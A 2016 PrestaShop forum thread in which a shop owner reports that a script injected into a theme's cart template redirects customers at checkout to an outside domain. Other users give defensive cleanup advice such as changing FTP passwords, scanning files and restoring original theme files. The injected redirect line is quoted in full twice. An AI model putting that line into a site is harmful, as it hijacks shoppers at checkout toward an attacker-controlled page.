p4presta Posted July 9, 2016 Share Posted July 9, 2016 Hi All, Our customers were being redirected from the cart / orders page to the following address http://cwcargo.com/Checkout On doing a search on the files, we found the below malicious code within the shopping-cart.tpl <script>document.location="http://cwcargo.com/Checkout"</script> Apart from deleting this code and changing FTP passwords - what can we do to prevent this We are using PrestaShop version: 1.6.0.8 and third party theme Thanks in advance Link to comment Share on other sites More sharing options...
endriu107 Posted July 9, 2016 Share Posted July 9, 2016 What is theme name? Link to comment Share on other sites More sharing options...
musicmaster Posted July 9, 2016 Share Posted July 9, 2016 If you look around the forum you will see that there are a lot of issues about hacked sites at the moment and that the main reason is some theme that has been hacked. So it is important that you answer the question of Endriu. If indeed you have one of the hacked themes than you would need to do a much more radical cleanup as you are doing now. Link to comment Share on other sites More sharing options...
p4presta Posted July 9, 2016 Author Share Posted July 9, 2016 Thanks for your replies The theme is called Autumn Link to comment Share on other sites More sharing options...
vekia Posted July 9, 2016 Share Posted July 9, 2016 did you find the malicious code? how it looks like? can you share it here? Link to comment Share on other sites More sharing options...
p4presta Posted July 9, 2016 Author Share Posted July 9, 2016 Vekia see below <script>document.location="http://cwcargo.com/Checkout"</script> I've cleaned it once but back again Link to comment Share on other sites More sharing options...
El Patron Posted July 10, 2016 Share Posted July 10, 2016 (edited) Follow this path it may help first change all ftp passwords, make sure you have up to date virus protection on your local computer using ftp downlaod to your computer shop files (here we expect to catch the virus/trojan). Key is to get current anti-virus to scan your shop files on your computer...typically the infect/inject a .js file...these then modify other files you might have already fixed but come back. (to replace files of native ps)...download your version from PS and unzip it for later reference (to replace files of theme) get original source of your downlaoded theme. Also, using ftp or hosting control panel (files), sort files by date looking for files that have been updated recently... note : folder 755 files 644 (is typical permissions) Then hopefully with other tips you can resolve, then consider this module (by me). https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-protection/ also see this from themeforest comments section, search 'hacked' https://themeforest.net/item/autumn-responsive-prestashop-16-theme-with-blog/3848244/comments?utf8=%E2%9C%93&term=hacked&from_buyers_and_authors_only=0 Edited July 10, 2016 by El Patron (see edit history) Link to comment Share on other sites More sharing options...
p4presta Posted July 12, 2016 Author Share Posted July 12, 2016 Thank you El Patron - shall definitely look into your module Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now